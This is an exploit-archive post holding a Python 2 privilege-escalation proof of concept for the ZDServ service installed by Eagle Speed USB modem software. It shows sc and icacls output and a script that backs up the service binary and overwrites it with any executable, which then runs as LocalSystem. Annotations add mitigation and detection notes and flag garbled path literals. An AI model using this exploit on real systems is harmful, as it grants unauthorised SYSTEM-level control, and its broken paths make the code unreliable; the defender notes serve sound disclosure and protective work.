Eagle Speed USB Modem Software Privilege Escalation
Posted on 29 November 2016
#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow reconfiguring the binary,
# but the path of the binary is writable by any authenticated user.
#
# C:Userslowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
# TYPE : 110 WIN32_OWN_PROCESS (interactive)
# START_TYPE : 2 AUTO_START
# ERROR_CONTROL : 1 NORMAL
# BINARY_PATH_NAME : "C:ProgramDataDSupportDServDServ.exe"
# LOAD_ORDER_GROUP :
# TAG : 0
# DISPLAY_NAME : ZDServ
# DEPENDENCIES :
# SERVICE_START_NAME : LocalSystem
#
#
#
# C:Userslowpriv>icacls "C:ProgramDataDSupportDServDServ.exe"
# C:ProgramDataDSupportDServDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
# NT AUTHORITYSYSTEM:(I)(F)
# BUILTINAdministrators:(I)(F)
# Victim-PClowpriv:(I)(F)
# BUILTINUsers:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
# # Video : https://youtu.be/o59SD8gXzlU #
#
# Proof-of-concept accompanying the advisory in the header: renames the
# ZDServ service image aside as a ".bak" file, copies the executable given
# as argv[1] over the original path, then checks the copy with filecmp.
# Python 2 syntax (print statements).
#
# NOTE(review): the path literals below appear to have lost their path
# separators during archival/extraction (e.g. "C:ProgramData..."), so they
# are not usable as written; treat them as an archival artefact.
#
# Defender notes (grounded in the icacls listing in the header):
#   Root cause : the service image carries an inherited ACE
#                "Everyone:(I)(F)", so any local user can overwrite a
#                binary that is started as LocalSystem on the next
#                service start or reboot.
#   Mitigation : remove the inherited Everyone / Users write access on
#                the service directory so that only Administrators and
#                SYSTEM can modify it, or have the installer place the
#                service image under a protected location with correct
#                ACLs.
#   Detection  : a rename of the service image to "*.bak", a new file
#                appearing at the BINARY_PATH_NAME, or a service binary
#                whose hash no longer matches the vendor's are the
#                artefacts this leaves; file-integrity monitoring on
#                service image paths surfaces all three.
import os
import sys
import filecmp

# Service image path as reported by "sc qc zdserv" in the header.
path = "C:ProgramDataDSupportDServDServ.exe"
# Shell command that keeps the original binary beside the replacement as
# ".bak" (an artefact worth looking for during incident response).
file_move = 'move "C:ProgramDataDSupportDServDServ.exe" "C:ProgramDataDSupportDServDServ.exe.bak"'
# ASCII-art banner printed before anything else happens; the literals are
# reproduced verbatim.
banner = " "
banner +=" ___ __ ____ _ _ "
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / | | "
banner +=" | || '_ | |_ / _ | | _ / _ '_ / _ | | "
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ | |___ "
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| "
print banner
if(len(sys.argv) < 2):
    # No payload path supplied: print usage and do nothing else.
    print ' Usage : exploit.py program.exe '
    print 'https://infogen.al/'
else:
    program = sys.argv[1]
    if(not os.path.isfile(program)):
        print "[-] The parameter was incorrect, use a correct filename [-]"
        # Exits with status 0 even though the input was rejected.
        exit(0)
    if(not os.path.isfile(path)):
        # Nothing to replace: the service image is not at the expected path.
        print "[-] File not found , propably service doesn't exists [-] "
    else:
        print "[+] Backing up the binary [+]"
        os.system(file_move)
        print "[+] Copying the payload [+]"
        # "program" is interpolated into the shell command unquoted, so a
        # path containing spaces breaks the copy.
        os.system("copy " + program + " " + path)
        # filecmp.cmp defaults to shallow=True: equal os.stat signatures
        # (type, size, mtime) count as equal without comparing contents.
        if(filecmp.cmp(program,path)):
            print "[+] Exploit successfull, wait for service to restart or reboot [+]"
        else:
            print "[-] Exploit failed [-]"